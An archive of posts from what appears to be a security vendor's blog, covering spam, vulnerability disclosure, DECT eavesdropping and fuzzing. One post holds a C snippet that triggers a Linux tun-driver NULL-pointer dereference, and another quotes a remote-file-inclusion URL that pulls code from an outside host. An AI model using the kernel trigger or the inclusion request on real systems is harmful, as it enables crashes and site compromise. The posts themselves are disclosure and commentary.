Posted on November 4th, 2009 by noam
Filed under: Commentary | 3 Comments »
I just read the sad news that str0ke, also known as the maintainer and founder of milw0rm, has passed away. The problem with this news item is that it is very difficult to judge whether or not it is true, as the source is not “the official news media” you would normally trust.
This of course will not hit CNN, FOX, or any other news agency, and will usually be posted on an underground mailing list or blog which may or may not have a hidden agenda with respect to giving out such news items.
This is of course not the first time someone was claimed to have died, with only rumours circulating and then, finally, after some time, it was determined to be true, as their site was no longer being updated and emails sent to them never got a reply.
If the story about str0ke is in fact true, I am saddened to hear it, and I send my condolences to his family, wife and 4 kids.
Posted on August 12th, 2009 by noam
Filed under: Commentary, Full Disclosure | 5 Comments »
We purchased security vulnerabilities as part of our SSD program from a researcher who has conducted an extensive audit of a popular bulletin board system, IPB. For those not familiar with it, it is a good product, quite common, and well supported by a commercial company called Invision Power. The audit revealed a few high-risk issues in the program allowing remote attackers to gain access to entries found in the database with minimal requirements on the attacker’s side.
After verifying the issue we contacted the company in several ways, emailing several addresses, but failed to “reach” anyone. We received several automated responses, and even our inquiry to their sales emails returned nothing. Are we missing something?
From their site it is apparent that support is provided only to paying customers. Fair enough, but I am not a customer, I am trying to help them. I am willing to give them the security research we paid for, for FREE, yes free; they aren’t asked to pay anything for the vulnerabilities discovered, they are only asked to fix them, which will benefit them for sure.
If anyone has an idea how we could reach Invision Power’s guys/developers, please feel free to contact me at noamr[at]beyondsecurity.com.
Posted on July 17th, 2009 by noam
Filed under: Commentary, Full Disclosure, Fuzzing | 1 Comment »
A NULL pointer dereference vulnerability in the tun driver source code of the Linux kernel has been discovered that looks “immune” when the code is audited, yet is vulnerable once GCC has applied its code optimizations: the pointer is dereferenced before it is checked for NULL, so the compiler treats the check as dead code and removes it.
The vulnerability allows executing arbitrary code and gaining root access.
An exploit has been released proving that the vulnerability is not just “theoretically” there, but can be actually exploited.
Need we say black box fuzzing? An API fuzzer such as beSTORM would have easily caught this, as beSTORM can be told to open the /dev/net/tun device and write data directly to it; one of the first tests it will perform is the “old” empty (NULL) data transfer.
BTW: If you want to test the vulnerability on your kernel, here is a code snippet:
#include <fcntl.h>
#include <poll.h>
#include <unistd.h>
int main(void) {
    struct pollfd pfd;
    int fd = open("/dev/net/tun", O_RDWR); /* no interface attached, so the driver's tun pointer is still NULL */
    if (fd < 0) return 1;
    pfd.fd = fd;
    pfd.events = POLLIN | POLLOUT;
    poll(&pfd, 1, 0); /* on a vulnerable kernel this dereferences NULL inside tun's poll handler */
    return 0;
}
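The pattern behind the bug, as an added illustration that is not part of the original post and not the kernel's own code: a check-after-use that an auditor reads as safe next to the hardened check-before-use ordering. The struct names and the readable field are constructed stand-ins, not the real tun driver types.

```c
#include <stddef.h>

/* Constructed stand-ins for the kernel structures; not the real tun driver types. */
struct sock { int readable; };
struct tun_struct { struct sock *sk; };

/* Check-after-use: tun is dereferenced (tun->sk) before it is tested for NULL.
 * The source contains a NULL check, so a code audit passes it, but dereferencing
 * NULL is undefined behaviour, so an optimizing compiler may conclude that tun
 * cannot be NULL here and drop the check as dead code. (GCC's
 * -fno-delete-null-pointer-checks flag turns that optimization off.) */
int poll_check_after_use(struct tun_struct *tun)
{
    struct sock *sk = tun->sk;   /* undefined behaviour when tun == NULL */
    if (!tun)
        return -1;               /* may be compiled away entirely */
    return sk->readable;
}

/* Check-before-use: test the pointer before any dereference, so the check is
 * meaningful both to the reader and to the compiler. */
int poll_check_before_use(struct tun_struct *tun)
{
    if (!tun)
        return -1;
    return tun->sk->readable;
}

/* Exercises the hardened version with an attached "interface" (constructed data). */
int demo_attached(int readable)
{
    struct sock s = { readable };
    struct tun_struct t = { &s };
    return poll_check_before_use(&t);
}
```

Only the hardened function may be called with a NULL pointer; the check-after-use version is there to show what the audited source looks like, not to be run that way.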
Posted on July 13th, 2009 by noam
Filed under: Commentary | 1 Comment »
In recent news, a posting on Slashdot talked about “Cruising Fisherman’s Wharf For New Passports’ Serial Numbers” as a means of gaining access to sensitive information, as well as being able to secretly conduct surveillance on people without their consent.
Is it just me, or has everyone forgotten the little devices, sometimes more than one, that they carry around with them all the time, called cellphones?
Those tiny devices are perfect for surveillance: they emit a signal; when the signal is too weak to reach a cell site they try harder; they - if enabled - broadcast their GPS location via Google Latitude; and they can allow anyone with the right equipment - not as expensive as you would think - to track you down.
I think that the RFID and passports “noise” being generated is just a smoke screen to distract people from the already existing, and already used, ability of governments (and bad people, of course) to track you down using the signals emitted by your cellphone.
RFID, unlike cellphones, can easily be blocked by simple means, for example by putting your passport into an aluminium/metal sleeve, while I don’t see anyone doing the same to their cellphones.
Posted on March 19th, 2009 by noam
Filed under: Commentary, Spam, Law | 5 Comments »
I received this email today:
Good morning!
I inform you about site http://carder.su where people trade in stolen credit cards. As i’m a holder of visa classic i’m sincerely
exasperated at appearing such sites in your hosting. I beg of you to take strong measures and don’t be indifferent to heart-break of other people. This complaint will be sent to the FBI.
Best regrads, Jon Shirov.
At first I was shocked: why would someone allow such a site to still be up even though someone reported it to the FBI? I had to do something.
Rushing to the rescue, I looked at the site and it appears to be a pretty straightforward scam-sell site: you go there and buy stolen goods.
Why have I been notified only now, I wondered… I looked back in my spam log and, what do you know, the same email appears more than once in my spam folder with different names, dates and, of course, email addresses.
I am not sure what the scam/spam’s purpose is; apparently they want you to go to their site and see what they have to offer - you might be a potential customer for their operation.
I of course didn’t dig into the site, nor am I interested in buying anything found there. On the other hand, I will also not report this to the FBI, as the site is not hosted inside the United States (it is hosted in Russia), nor is its domain under a US registrar (it ends with .su).
Whoever knows of a place to report such sites to, please let me (us) know.
Posted on February 24th, 2009 by noam
Filed under: Commentary, Spam | 4 Comments »
A short list of legitimate emails you will never get; if you have something else, feel free to add:
* Lottery winnings - Microsoft is the big winner here, they keep sending me winning notifications, but I just don’t collect
* Your doctor’s prescription (probably some obscure medicine might go through, while most won’t) - to get you to buy “cheap” fake medicine
* Your Antivirus renewal notice - trying to get you to install some form of malware
* Your bank’s security notice, and statement - of course it’s phishing scams
* PayPal payments being made to your name or from your name - phishing scams mainly
* Job offers - I get these money “mule” offers and get-paid-per-call spam
Anything I missed?
Posted on December 30th, 2008 by noam
Filed under: Gadgets, Commentary, Privacy, Physical Security, Encryption | No Comments »
What started off nicely in 1992 and promised the much needed privacy for cordless communication at home has been brought to a halt a few days ago with a practical approach to eavesdropping on DECT communication.
DECT, or Digital Enhanced Cordless Telecommunications, is a widely used standard for cordless devices, mainly phones but not limited to them; several POS (Point of Sale) devices also use the standard to communicate in a cheap and secure manner.
The DECT standard itself was not broken; rather, using a cheap off-the-shelf device that is able to receive (not yet transmit) DECT-based data, the researchers have been able to prove that eavesdropping on the communication channel is possible.
Most interesting to me as a reader of the paper is that what stopped people from ‘breaking’ it till now was the lack of hardware, or rather the lack of cheap hardware, to experiment with; now, with the availability (it has been around for a while) of the COM-ON-AIR device and its character device (or raw software driver), things have been made a lot easier.
You can read more on this at deDECTed.org.
Posted on December 29th, 2008 by noam
Filed under: Commentary, Spam | 3 Comments »
Following up on my previous post on spam, it seems that spam has now gone another step and become not just unreadable - in a foreign language - but also unreadable to the un-computerized eye:
Subject: Please confirm your message
Body:
Wow, that is nice, I would sure want to buy an IURPQ1…
This is plain silly: it is a Base64-encoded message, but why would my reader open it?
There is an indication in the email headers that this is Base64 encoded, but I can’t understand what kind of reader will even try to open it, as it seems that Base64-encoded content inside a body is not common practice unless it is part of a multipart message.
For those wondering, the email’s intention is to show you an HTML page that sells you fake? real? pills.
Posted on December 23rd, 2008 by noam
Filed under: Commentary, Privacy, Full Disclosure, Google, Corporate Security, Networking | 2 Comments »
Yes, snooping on someone else’s GoogleTalk is no big deal if you know their password, but what is interesting is that, unlike other chat clients like Skype, MSN and others, GoogleTalk will allow you to do so simultaneously.
You can connect to the GoogleTalk server while another user using the same username and password is also connected to the GoogleTalk server.
This neat feature, which probably stems from the fact that Google supports web-based chat in a constantly refreshing web page (unlike MSN, which launches a separate window), allows you to see incoming responses and messages being sent to your target without needing to do anything.
BTW Google, don’t fix this, I find it useful for my BlackBerry and PC chat sharing - basically I never need to log on/off on my PC/BlackBerry; they are both constantly connected to the Google Talk servers.
UPDATE: This post is not related to the recently released NSA patent on snoop detection.
Posted on December 21st, 2008 by noam
Filed under: Commentary, Fuzzing | No Comments »
With the recent introduction of a native SCTP library into beSTORM you can easily fuzz your SCTP based protocols with beSTORM.
This includes all our existing protocols as well as SCTP dedicated protocols such as M3UA and MGCP.
SCTP, for those that aren’t familiar with it, is a fairly common protocol in the VoIP and telecommunication industry; it sits on top of IP and ‘replaces’ the TCP/UDP layers. It has several benefits over TCP and UDP, but it is mainly used because it has been endorsed by the SIGTRAN group as the primary way of communication between two telecommunication providers.
Posted on December 15th, 2008 by noam
Filed under: Commentary | 2 Comments »
Many administrators blindly block anything that isn’t running on either port 80 (http), 443 (https) or 22 (ssh). Their claim is that nothing good can run on any other port. This causes their users to get frustrated when they want to use anything else that runs on any other port.
I am not talking about P2P or any other ‘evil’ programs, which are pretty good at bypassing your restrictions on their own (Skype is one such example); I am talking about, for example, one of your engineers wanting to get tech support but having his corporate VPN access blocked, as most VPNs require at least one port other than 80, 443 or 22 to be open.
In such cases (as with VPN), the tech support guy will find a way around your restriction, perhaps using port 443 to tunnel the traffic through, even though it’s not really SSL going inside there. The smart administrator will use a proxy or a content filtering agent to prevent such things, so a smart tech support guy will tunnel everything via SSH, or even use HTTPS to tunnel the data (there are several solutions that do that).
My point is that blindly blocking will give you the benefit of stopping the common user, but will frustrate a tech support guy to the point that he will find a way to bypass it. I suggest that you ‘give’ the tech support guy a hand: understand what he needs, and give him that. It’s better than him bypassing your restriction.
I am sure the readers have additional examples that can strengthen this point.
Posted on December 11th, 2008 by noam
Filed under: Commentary, Spam | No Comments »
Yes, this should have brought tears to your eyes too: Spam Volumes Drop by Two-Thirds After Firm Goes Offline. But luckily I cried too soon; I have seen spam amounts on the increase in the past 2 weeks. And unlike previous spam that my bogofilter and SpamAssassin were able to handle, this new spam is something that they can’t - or at least can’t yet.
I wonder what happened to make spam more ‘intelligent’. One thought that comes to my mind is that since the massive botnet that was used to send spam is now owned by someone else, the spam now looks different - something else generates it, while the same network sends it out.
I hope they catch the guy who’s keeping this network alive, and take it down once more; we deserve the relief from spam for a few days at least.
On a side note, I have seen an increase in foreign spam, natively written Russian, Chinese and Japanese spam - this is even more silly than regular English-written spam, as I can’t even begin to wonder what they are trying to sell me.
Posted on December 8th, 2008 by noam
Filed under: Commentary, Spam | 3 Comments »
Even to write spam you apparently need:
1) A spell checker
2) To understand what the words mean
This is the spam email I received; why would someone even want to answer it?
Hello,
I am Ming Yang,i have an obscured busines suggestion for you.please
Contact me for further details on ( [removed]@yahoo.com.hk )
Kind Regards
Ming Yang
Mail: [removed]@yahoo.com.hk
Posted on December 6th, 2008 by noam
Filed under: Commentary, Full Disclosure | 1 Comment »
I recently received an email from a co-worker which crashed my email reader when I clicked on it (to preview it).
The crash was so weird that I had to try it again.
I reopened the email reader and clicked on the email again, and of course it crashed once more.
I investigated a bit further and noticed that the email contained a TNEF file which my email reader tried to automatically parse, and apparently failed due to a bad memcpy call (copying more than you have allocated space for).
Once I zero in on what is triggering it, I will report it to the vendor.
Posted on December 4th, 2008 by noam
Filed under: Commentary, Spam | 6 Comments »
I recently received a spam email that wants me to buy solar lamps for the garden; my first impulse, of course, was to delete it. But I had to admit I wanted those solar lamps; they looked nice, and the price was OK.
I have no idea what to do now. On the one hand this was sent as part of a spam campaign, so buying might prove to be:
1) Fraudulent - pay get nothing (best chances)
2) A scam - pay get nothing worth your money (moderate chances)
3) A legitimate deal - pay and get what I paid for (slim chances)
In addition, of course, to the fact that if I buy it I am proving the spammer’s agenda: that someone wants their merchandise and this is their only way to reach him.
What do you guys suggest I do?
Posted on November 12th, 2008 by noam
Filed under: Web, Commentary, Google | 2 Comments »
You are probably reading this post asking yourself “why does he even let me know”. So I will start by saying that my boy had his birthday a few months ago, so this post isn’t about him; it’s completely unrelated.
It has to do with this site: http://babycaleb.fort unecity.co.uk/ (I broke the link so people do not JUST jump and go to it)
This site isn’t mine; it was used to hack a friend’s web site, so I took it upon myself to look into it.
This site hosts a few pictures; some are quite weird to put online (hint: My Wifes Scar), while others are completely harmless (hint: My baby).
The issue is not in the pictures but rather in what is there and cannot be seen without doing a bit of digging.
I will give some more hints in a follow-up post, if no one else comes up with what this site does to you.
(Another hint, the site of my friend was hacked using this link: /clock.php?arg_tmirror=http://babycaleb.fortu necity.co.uk/index.htm)